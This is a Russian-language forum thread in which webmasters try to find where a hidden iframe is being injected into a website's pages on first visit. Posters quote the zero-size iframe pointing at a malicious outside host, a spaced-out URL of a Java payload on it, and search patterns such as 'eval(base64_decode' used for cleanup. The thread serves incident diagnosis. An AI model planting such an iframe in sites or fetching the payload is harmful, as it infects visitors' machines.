Agel Nash

Agel Nash:
Чисто...
Пряма мистика какая то..........

Us2828:
Такое попробуй
$sky
и универсальное такое
eval(base64_decode

Дикий пионер:
Я по modX не большой спец, но посмотрел бы на плагины, которые подписаны на собфтия из категории
Template Service Events
Есть еще конечно экзотический вариант, что в htaccess как-то php_auto_append_file ставят, но в этом случае сам скрипт-то где-то тоже должен быть.

Дикий пионер:
В вашем движке куча всего хранится в базе - в том числе и шаблоны, смотрите базу, модули, плагины, сниппеты установленные.
Сделайте дамп базы и в нем поищите скрипты.

Leadmonkey:
Та же ерунда. Сайт - voenhunt.ru при первом заходе на страницу есть вот это <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> в котором скрипт. При повторном заходе - пусто. Никак не могу понят, откуда эта дрянь выводится. В файлах на сервере ничего подобного нет

firefox19:
Зря игнорируете, проблема в скриптах, а точнее - в движке как минимум, и копать надо серьезно
Но дело хозяйское.

garry69:
У вас стоит клкандер( при клике по картинке) или что то такое. Похоже подгружает от туда.

Posting_i_PIAR:
сделайте полный бэкап на дату раньше даты заражение.
поменяйте все пароли.

Дикий пионер:
Тоже поучаствую

<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>

<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/2716654" alt="" /></div></noscript>

<!-- /Yandex.Metrika counter --></div><div class="body">



<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>





<div class="headline">

<div class="logo"><h1>Видеокурсы</h1>обучение по видеоурокам</div>

Ищите откуда этот код выводится. Переводы строк добавил для лучшей видимости.

Кстати, фрейм есть только на первый заход, потом странички без него отдаются - так что какой-то скрипт у вас серверный этим руководит.

garry69:
Из кода сохраненки гугла весь не привести из за длинны:

<script type="text/javascript">

var rnumber = Math.floor(Math.random()*9999999);

var widget_so = new SWFObject("/assets/templates/video/tagcloud.swf?r="+rnumber, "tagcloudflash", "200", "200", "9", "#ffffff");

widget_so.addParam("allowScriptAccess", "always");widget_so.addVariable("tcolor", "0x333333");

widget_so.addVariable("tspeed", "115");

widget_so.addVariable("distr", "false");

widget_so.addVariable("mode", "tags");

widget_so.addVariable("tagcloud", "%3Ctags%3E%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B3%25D1%2580%25D0%25B0%25D0%25BC%25D0%25BC%25D0%25B8%25D1%2580%25D0%25BE%25D0%25B2%25D0%25B0%25D0%25BD%25D0%25B8%25D0%25B5%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%26quot%3B+%281%29%22%3E%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%258D%25D0%25BB%25D0%25B5%25D0%25BA%25D1%2582%25D1%2580%25D0%25BE%25D0%25B8%25D0%25BD%25D1%2581%25D1%2582%25D1%2580%25D1%2583%25D0%25BC%25D0%25B5%25D0%25BD%25D1%2582%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%8D%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%26quot%3B+%281%29%22%3E%D1%8D%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3Dphp%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3Bphp%26quot%3B+%281%29%22%3Ephp%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2581%25D0%25B0%25D0%25BA%25D1%2581%25D0%25BE%25D1%2584%25D0%25BE%25D0%25BD%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%81%D0%B0%D0%BA%D1%81%D0%BE%D1%84%D0%BE%D0%BD%26quot%3B+%281%29%22%3E%D1%81%D0%B0%D0%BA%D1%81%D0%BE%D1%84%D0%BE%D0%BD%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B8%25D0%25BC%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25B8%25D0%25B7%25D0%25B0%25D1%2586%25D0%25B8%25D1%258F%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B8%D0%BC%D0%BF%D1%80%D0%BE%D0%B2%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F%26quot%3B+%281%29%22%3E%D0%B8%D0%BC%D0%BF%D1%80%D0%BE%D0%B2%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2586%25D0%25B2%25D0%25B5%25D1%2582%25D1%258B%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%86%D0%B2%D0%B5%D1%82%D1%8B%26quot%3B+%281%29%22%3E%D1%86%D0%B2%D0%B5%D1%82%D1%8B%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2580%25D0%25B0%25D1%2581%25D1%2582%25D0%25B5%25D0%25BD%25D0%25B8%25D1%258F%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F%26quot%3B+%281%29%22%3E%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B8%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D1%2580%25D0%25B0%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9%2B%25D1%258F%25D0%25B7%25D1%258B%25D0%25BA%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9+%D1%8F%D0%B7%D1%8B%D0%BA%26quot%3B+%281%29%22%3E%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9+%D1%8F%D0%B7%D1%8B%D0%BA%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B0%25D0%25BD%25D0%25B3%25D0%25BB%25D0%25B8%25D0%25B9%25D1%2581%25D0%25BA%25D0%25B8%25D0%25B9%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9%26quot%3B+%281%29%22%3E%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B1%25D0%25BE%25D0%25BB%25D0%25B5%25D0%25B7%25D0%25BD%25D0%25B8%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B1%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D0%B8%26quot%3B+%281%29%22%3E%D0%B1%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D0%B8%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25BE%25D1%2582%25D0%25BE%25D0%25BF%25D0%25BB%25D0%25B5%25D0%25BD%25

widget_so.write("tags");</script> 

garry69:
Хм, сейчас не грузит ничего. Странно что перманентно.
У вас не стоит ни каких всплывающих окон или рекламы подобной?

DyaDya:
Так не всегда прокатывает. Антивири могут не видеть вирь в коде сайта, но опознавать при его подгрузке со стороннего сайта.
Странно, что гугл ещё не вывесел предупреждение о вире. Обычно он раньше яшки реагирует.

Нужно найти код, по которому можно определить вставку виря и прогнать поиском по всему сайту. Например, по SSH с помощью команд примерно такого вида:

webrock:
Что б ускорить поиск, сделайте бэкап сайта, скачайте и проверьте анивирем. А потом смотрите что антивирь нашёл и по указанным путям удаляйте всё "вшивое" на хосте.

garry69:
У вас верусни там не один подгружает. Вот номер один
ladygaga . ipq . co / games / javaobe . jar
Растянул дабы не кликнули. Ищите фреймы или точнее незнакомый код вверху или внизу индексных.
Увидите сразу.
Дальше чистим комп, меняем пароли фтп и тд.